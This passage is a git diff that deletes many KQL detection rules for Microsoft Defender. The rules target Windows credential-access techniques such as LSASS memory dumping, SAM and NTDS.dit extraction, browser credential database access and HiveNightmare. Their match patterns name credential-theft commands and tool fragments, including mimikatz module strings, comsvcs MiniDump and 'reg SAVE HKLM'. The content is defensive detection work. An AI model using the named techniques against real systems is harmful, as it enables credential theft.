\ No newline at end of file
diff --git a/Credential Access/Process_Access_via_TrolleyExpress_Exclusion.kql b/Credential Access/Process_Access_via_TrolleyExpress_Exclusion.kql
deleted file mode 100644
index 3f8a20a2..00000000
--- a/Credential Access/Process_Access_via_TrolleyExpress_Exclusion.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/10
-// Level: high
-// Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
-// Tags: attack.defense_evasion, attack.t1218.011, attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\TrolleyExpress 7" or ProcessCommandLine contains "\\TrolleyExpress 8" or ProcessCommandLine contains "\\TrolleyExpress 9" or ProcessCommandLine contains "\\TrolleyExpress.exe 7" or ProcessCommandLine contains "\\TrolleyExpress.exe 8" or ProcessCommandLine contains "\\TrolleyExpress.exe 9" or ProcessCommandLine contains "\\TrolleyExpress.exe -ma ") or (FolderPath endswith "\\TrolleyExpress.exe" and (not((isnull(ProcessVersionInfoOriginalFileName) or ProcessVersionInfoOriginalFileName contains "CtxInstall"))))
\ No newline at end of file
diff --git a/Credential Access/Process_Memory_Dump_Via_Comsvcs.DLL.kql b/Credential Access/Process_Memory_Dump_Via_Comsvcs.DLL.kql
deleted file mode 100644
index 2530eb6f..00000000
--- a/Credential Access/Process_Memory_Dump_Via_Comsvcs.DLL.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/02/18
-// Level: high
-// Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
-// Tags: attack.defense_evasion, attack.credential_access, attack.t1036, attack.t1003.001, car.2013-05-009
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") and ((ProcessCommandLine contains "#-" or ProcessCommandLine contains "#+" or ProcessCommandLine contains "#24" or ProcessCommandLine contains "24 " or ProcessCommandLine contains "MiniDump") and (ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))) or ((ProcessCommandLine contains " #" or ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #") and (ProcessCommandLine contains "24" and ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))
\ No newline at end of file
diff --git a/Credential Access/Process_Memory_Dump_via_RdrLeakDiag.EXE.kql b/Credential Access/Process_Memory_Dump_via_RdrLeakDiag.EXE.kql
deleted file mode 100644
index dfd4dc8d..00000000
--- a/Credential Access/Process_Memory_Dump_via_RdrLeakDiag.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/09/24
-// Level: high
-// Description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "fullmemdmp" or ProcessCommandLine contains "/memdmp" or ProcessCommandLine contains "-memdmp") and (ProcessCommandLine contains " -o " or ProcessCommandLine contains " /o ") and (ProcessCommandLine contains " -p " or ProcessCommandLine contains " /p ")) or ((FolderPath endswith "\\rdrleakdiag.exe" or ProcessVersionInfoOriginalFileName =~ "RdrLeakDiag.exe") and (ProcessCommandLine contains "fullmemdmp" or ProcessCommandLine contains "/memdmp" or ProcessCommandLine contains "-memdmp"))
\ No newline at end of file
diff --git a/Credential Access/QuarksPwDump_Dump_File.kql b/Credential Access/QuarksPwDump_Dump_File.kql
deleted file mode 100644
index f54a872d..00000000
--- a/Credential Access/QuarksPwDump_Dump_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/02/10
-// Level: critical
-// Description: Detects a dump file written by QuarksPwDump password dumper
-// Tags: attack.credential_access, attack.t1003.002
-DeviceFileEvents
-| where FolderPath contains "\\AppData\\Local\\Temp\\SAM-" and FolderPath contains ".dmp"
\ No newline at end of file
diff --git a/Credential Access/SQLite_Chromium_Profile_Data_DB_Access.kql b/Credential Access/SQLite_Chromium_Profile_Data_DB_Access.kql
deleted file mode 100644
index 630b3df1..00000000
--- a/Credential Access/SQLite_Chromium_Profile_Data_DB_Access.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: TropChaud
-// Date: 2022/12/19
-// Level: high
-// Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
-// Tags: attack.credential_access, attack.t1539, attack.t1555.003, attack.collection, attack.t1005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\User Data\\" or ProcessCommandLine contains "\\Opera Software\\" or ProcessCommandLine contains "\\ChromiumViewer\\") and (ProcessCommandLine contains "Login Data" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Web Data" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe"))
\ No newline at end of file
diff --git a/Credential Access/SQLite_Firefox_Profile_Data_DB_Access.kql b/Credential Access/SQLite_Firefox_Profile_Data_DB_Access.kql
deleted file mode 100644
index fbc2f1fc..00000000
--- a/Credential Access/SQLite_Firefox_Profile_Data_DB_Access.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/08
-// Level: high
-// Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
-// Tags: attack.credential_access, attack.t1539, attack.collection, attack.t1005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "places.sqlite") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe"))
\ No newline at end of file
diff --git a/Credential Access/SafetyKatz_Default_Dump_Filename.kql b/Credential Access/SafetyKatz_Default_Dump_Filename.kql
deleted file mode 100644
index a2762bbb..00000000
--- a/Credential Access/SafetyKatz_Default_Dump_Filename.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis
-// Date: 2018/07/24
-// Level: high
-// Description: Detects default lsass dump filename from SafetyKatz
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where FolderPath endswith "\\Temp\\debug.bin"
\ No newline at end of file
diff --git a/Credential Access/Sensitive_File_Dump_Via_Wbadmin.EXE.kql b/Credential Access/Sensitive_File_Dump_Via_Wbadmin.EXE.kql
deleted file mode 100644
index 07998e4b..00000000
--- a/Credential Access/Sensitive_File_Dump_Via_Wbadmin.EXE.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2024/05/10
-// Level: high
-// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
-Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
-
-// Tags: attack.credential_access, attack.t1003.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "start" or ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") and (ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit")
\ No newline at end of file
diff --git a/Credential Access/Sensitive_File_Recovery_From_Backup_Via_Wbadmin.EXE.kql b/Credential Access/Sensitive_File_Recovery_From_Backup_Via_Wbadmin.EXE.kql
deleted file mode 100644
index b8e893e8..00000000
--- a/Credential Access/Sensitive_File_Recovery_From_Backup_Via_Wbadmin.EXE.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2024/05/10
-// Level: high
-// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
-Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
-
-// Tags: attack.credential_access, attack.t1003.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit") and (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/Credential Access/Shadow_Copies_Creation_Using_Operating_Systems_Utilities.kql b/Credential Access/Shadow_Copies_Creation_Using_Operating_Systems_Utilities.kql
deleted file mode 100644
index e9be73a7..00000000
--- a/Credential Access/Shadow_Copies_Creation_Using_Operating_Systems_Utilities.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
-// Date: 2019/10/22
-// Level: medium
-// Description: Shadow Copies creation using operating systems utilities, possible credential access
-// Tags: attack.credential_access, attack.t1003, attack.t1003.002, attack.t1003.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "shadow" and ProcessCommandLine contains "create") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE")))
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Active_Directory_Database_Snapshot_Via_ADExplorer.kql b/Credential Access/Suspicious_Active_Directory_Database_Snapshot_Via_ADExplorer.kql
deleted file mode 100644
index 9babcb21..00000000
--- a/Credential Access/Suspicious_Active_Directory_Database_Snapshot_Via_ADExplorer.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/14
-// Level: high
-// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory.
-// Tags: attack.credential_access, attack.t1552.001, attack.t1003.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "snapshot" and (FolderPath endswith "\\ADExplorer.exe" or ProcessVersionInfoOriginalFileName =~ "AdExp") and (ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Dump64.exe_Execution.kql b/Credential Access/Suspicious_Dump64.exe_Execution.kql
deleted file mode 100644
index 0f7d9a83..00000000
--- a/Credential Access/Suspicious_Dump64.exe_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer @austinsonger, Florian Roth
-// Date: 2021/11/26
-// Level: high
-// Description: Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where (FolderPath endswith "\\dump64.exe" and (not(FolderPath contains "\\Installer\\Feedback\\dump64.exe"))) or (FolderPath endswith "\\dump64.exe" and (ProcessCommandLine contains " -ma " or ProcessCommandLine contains "accepteula"))
\ No newline at end of file
diff --git a/Credential Access/Suspicious_File_Event_With_Teams_Objects.kql b/Credential Access/Suspicious_File_Event_With_Teams_Objects.kql
deleted file mode 100644
index 564a514a..00000000
--- a/Credential Access/Suspicious_File_Event_With_Teams_Objects.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @SerkinValery
-// Date: 2022/09/16
-// Level: high
-// Description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
-// Tags: attack.credential_access, attack.t1528
-DeviceFileEvents
-| where (FolderPath contains "\\Microsoft\\Teams\\Cookies" or FolderPath contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\current\\Teams.exe"))
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Key_Manager_Access.kql b/Credential Access/Suspicious_Key_Manager_Access.kql
deleted file mode 100644
index 4ccbd4ac..00000000
--- a/Credential Access/Suspicious_Key_Manager_Access.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/21
-// Level: high
-// Description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)
-// Tags: attack.credential_access, attack.t1555.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "keymgr" and ProcessCommandLine contains "KRShowKeyMgr") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Credential Access/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql b/Credential Access/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql
deleted file mode 100644
index df06d4d8..00000000
--- a/Credential Access/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Elastic (idea), Tobias Michalski (Nextron Systems)
-// Date: 2022/05/04
-// Level: high
-// Description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service
-// Tags: attack.privilege_escalation, attack.credential_access, attack.t1212
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "spoolss" or ProcessCommandLine contains "srvsvc" or ProcessCommandLine contains "/print/pipe/") and (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine contains "http")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Office_Token_Search_Via_CLI.kql b/Credential Access/Suspicious_Office_Token_Search_Via_CLI.kql
deleted file mode 100644
index 230502e3..00000000
--- a/Credential Access/Suspicious_Office_Token_Search_Via_CLI.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/25
-// Level: medium
-// Description: Detects possible search for office tokens via CLI by looking for the string "eyJ0eX". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.
-// Tags: attack.credential_access, attack.t1528
-DeviceProcessEvents
-| where ProcessCommandLine contains "eyJ0eXAiOi" or ProcessCommandLine contains " eyJ0eX" or ProcessCommandLine contains " \"eyJ0eX\"" or ProcessCommandLine contains " 'eyJ0eX'"
\ No newline at end of file
diff --git a/Credential Access/Suspicious_PFX_File_Creation.kql b/Credential Access/Suspicious_PFX_File_Creation.kql
deleted file mode 100644
index 882b9d15..00000000
--- a/Credential Access/Suspicious_PFX_File_Creation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.
-// Tags: attack.credential_access, attack.t1552.004
-DeviceFileEvents
-| where FolderPath endswith ".pfx" and (not((FolderPath contains "\\Templates\\Windows\\Windows_TemporaryKey.pfx" and FolderPath contains "\\CMake\\")))
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Process_Patterns_NTDS.DIT_Exfil.kql b/Credential Access/Suspicious_Process_Patterns_NTDS.DIT_Exfil.kql
deleted file mode 100644
index 88ae7640..00000000
--- a/Credential Access/Suspicious_Process_Patterns_NTDS.DIT_Exfil.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/11
-// Level: high
-// Description: Detects suspicious process patterns used in NTDS.DIT exfiltration
-// Tags: attack.credential_access, attack.t1003.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "ac i ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "/c copy " and ProcessCommandLine contains "\\windows\\ntds\\ntds.dit") or (ProcessCommandLine contains "activate instance ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "ntds.dit") or ((FolderPath endswith "\\NTDSDump.exe" or FolderPath endswith "\\NTDSDumpEx.exe") or (ProcessCommandLine contains "ntds.dit" and ProcessCommandLine contains "system.hiv") or ProcessCommandLine contains "NTDSgrab.ps1")) or (((InitiatingProcessFolderPath contains "\\apache" or InitiatingProcessFolderPath contains "\\tomcat" or InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\") or (FolderPath contains "\\apache" or FolderPath contains "\\tomcat" or FolderPath contains "\\AppData\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Public\\" or FolderPath contains "\\PerfLogs\\")) and ProcessCommandLine contains "ntds.dit")
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Reg_Add_Open_Command.kql b/Credential Access/Suspicious_Reg_Add_Open_Command.kql
deleted file mode 100644
index 9ff5ebd0..00000000
--- a/Credential Access/Suspicious_Reg_Add_Open_Command.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/20
-// Level: medium
-// Description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key
-// Tags: attack.credential_access, attack.t1003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/ve " and ProcessCommandLine contains "/d") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "DelegateExecute") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings")
\ No newline at end of file
diff --git a/Credential Access/Suspicious_SYSTEM_User_Process_Creation.kql b/Credential Access/Suspicious_SYSTEM_User_Process_Creation.kql
deleted file mode 100644
index 76673450..00000000
--- a/Credential Access/Suspicious_SYSTEM_User_Process_Creation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords)
-// Date: 2021/12/20
-// Level: high
-// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
-// Tags: attack.credential_access, attack.defense_evasion, attack.privilege_escalation, attack.t1134, attack.t1003, attack.t1027
-DeviceProcessEvents
-| where ((ProcessIntegrityLevel =~ "System" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\ping.exe") or (ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " -decode " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /urlcache " or ProcessCommandLine contains " -urlcache " or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " JAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SUVYI") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SQBFAFgA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aWV4I") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " IAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aQBlAHgA") or ProcessCommandLine contains "vssadmin delete shadows" or ProcessCommandLine contains "reg SAVE HKLM" or ProcessCommandLine contains " -ma " or ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "event::clear" or ProcessCommandLine contains "event::drop" or ProcessCommandLine contains "id::modify" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "misc::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "sid::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "vault::cred" or ProcessCommandLine contains "vault::list" or ProcessCommandLine contains " p::d " or ProcessCommandLine contains ";iex(" or ProcessCommandLine contains "MiniDump" or ProcessCommandLine contains "net user "))) and (not((InitiatingProcessFolderPath contains ":\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (ProcessCommandLine contains " -ma " and (FolderPath contains ":\\Program Files (x86)\\Java\\" or FolderPath contains ":\\Program Files\\Java\\") and FolderPath endswith "\\bin\\jp2launcher.exe" and (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Java\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Java\\") and InitiatingProcessFolderPath endswith "\\bin\\javaws.exe") or ProcessCommandLine =~ "ping 127.0.0.1 -n 5" or (FolderPath endswith "\\PING.EXE" and InitiatingProcessCommandLine contains "\\DismFoDInstall.cmd"))))
\ No newline at end of file
diff --git a/Credential Access/Suspicious_SYSVOL_Domain_Group_Policy_Access.kql b/Credential Access/Suspicious_SYSVOL_Domain_Group_Policy_Access.kql
deleted file mode 100644
index 5733d349..00000000
--- a/Credential Access/Suspicious_SYSVOL_Domain_Group_Policy_Access.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Jonhnathan Ribeiro, oscd.community
-// Date: 2018/04/09
-// Level: medium
-// Description: Detects Access to Domain Group Policies stored in SYSVOL
-// Tags: attack.credential_access, attack.t1552.006
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\SYSVOL\\" and ProcessCommandLine contains "\\policies\\"
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Serv-U_Process_Pattern.kql b/Credential Access/Suspicious_Serv-U_Process_Pattern.kql
deleted file mode 100644
index 2f0ddfb0..00000000
--- a/Credential Access/Suspicious_Serv-U_Process_Pattern.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/07/14
-// Level: high
-// Description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service
-// Tags: attack.credential_access, attack.t1555, cve.2021.35211
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe") and InitiatingProcessFolderPath endswith "\\Serv-U.exe"
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Unattend.xml_File_Access.kql b/Credential Access/Suspicious_Unattend.xml_File_Access.kql
deleted file mode 100644
index 4f10fd22..00000000
--- a/Credential Access/Suspicious_Unattend.xml_File_Access.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/12/19
-// Level: medium
-// Description: Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.
-If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process
-
-// Tags: attack.credential_access, attack.t1552.001
-DeviceFileEvents
-| where FolderPath endswith "\\unattend.xml"
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Usage_Of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql b/Credential Access/Suspicious_Usage_Of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql
deleted file mode 100644
index 2de6740e..00000000
--- a/Credential Access/Suspicious_Usage_Of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/14
-// Level: medium
-// Description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.
-// Tags: attack.credential_access, attack.t1003.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "snapshot" and ProcessCommandLine contains "mount ") or (ProcessCommandLine contains "ac" and ProcessCommandLine contains " i" and ProcessCommandLine contains " ntds")) and (FolderPath endswith "\\ntdsutil.exe" or ProcessVersionInfoOriginalFileName =~ "ntdsutil.exe")
\ No newline at end of file
diff --git a/Credential Access/Time_Travel_Debugging_Utility_Usage.kql b/Credential Access/Time_Travel_Debugging_Utility_Usage.kql
deleted file mode 100644
index 676604a5..00000000
--- a/Credential Access/Time_Travel_Debugging_Utility_Usage.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
-// Date: 2020/10/06
-// Level: high
-// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
-// Tags: attack.defense_evasion, attack.credential_access, attack.t1218, attack.t1003.001
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\tttracer.exe"
\ No newline at end of file
diff --git a/Credential Access/Time_Travel_Debugging_Utility_Usage_-_Image.kql b/Credential Access/Time_Travel_Debugging_Utility_Usage_-_Image.kql
deleted file mode 100644
index 856e72cb..00000000
--- a/Credential Access/Time_Travel_Debugging_Utility_Usage_-_Image.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
-// Date: 2020/10/06
-// Level: high
-// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
-// Tags: attack.defense_evasion, attack.credential_access, attack.t1218, attack.t1003.001
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\ttdwriter.dll" or FolderPath endswith "\\ttdloader.dll"
\ No newline at end of file
diff --git a/Credential Access/Typical_HiveNightmare_SAM_File_Export.kql b/Credential Access/Typical_HiveNightmare_SAM_File_Export.kql
deleted file mode 100644
index a1ad103b..00000000
--- a/Credential Access/Typical_HiveNightmare_SAM_File_Export.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/07/23
-// Level: high
-// Description: Detects files written by the different tools that exploit HiveNightmare
-// Tags: attack.credential_access, attack.t1552.001, cve.2021.36934
-DeviceFileEvents
-| where (FolderPath contains "\\hive_sam_" or FolderPath contains "\\SAM-2021-" or FolderPath contains "\\SAM-2022-" or FolderPath contains "\\SAM-2023-" or FolderPath contains "\\SAM-haxx" or FolderPath contains "\\Sam.save") or FolderPath =~ "C:\\windows\\temp\\sam"
\ No newline at end of file
diff --git a/Credential Access/Uncommon_Outbound_Kerberos_Connection.kql b/Credential Access/Uncommon_Outbound_Kerberos_Connection.kql
deleted file mode 100644
index 959bf177..00000000
--- a/Credential Access/Uncommon_Outbound_Kerberos_Connection.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Ilyas Ochkov, oscd.community
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
-
-// Tags: attack.credential_access, attack.t1558, attack.lateral_movement, attack.t1550.003
-DeviceNetworkEvents
-| where RemotePort == 88 and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe")) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or InitiatingProcessFolderPath endswith "\\tomcat\\bin\\tomcat8.exe")))
\ No newline at end of file
diff --git a/Credential Access/VolumeShadowCopy_Symlink_Creation_Via_Mklink.kql b/Credential Access/VolumeShadowCopy_Symlink_Creation_Via_Mklink.kql
deleted file mode 100644
index 28c58e45..00000000
--- a/Credential Access/VolumeShadowCopy_Symlink_Creation_Via_Mklink.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, oscd.community
-// Date: 2019/10/22
-// Level: high
-// Description: Shadow Copies storage symbolic link creation using operating systems utilities
-// Tags: attack.credential_access, attack.t1003.002, attack.t1003.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "mklink" and ProcessCommandLine contains "HarddiskVolumeShadowCopy"
\ No newline at end of file
diff --git a/Credential Access/WerFault_LSASS_Process_Memory_Dump.kql b/Credential Access/WerFault_LSASS_Process_Memory_Dump.kql
deleted file mode 100644
index 2afb8c5f..00000000
--- a/Credential Access/WerFault_LSASS_Process_Memory_Dump.kql	
+++ /dev/null
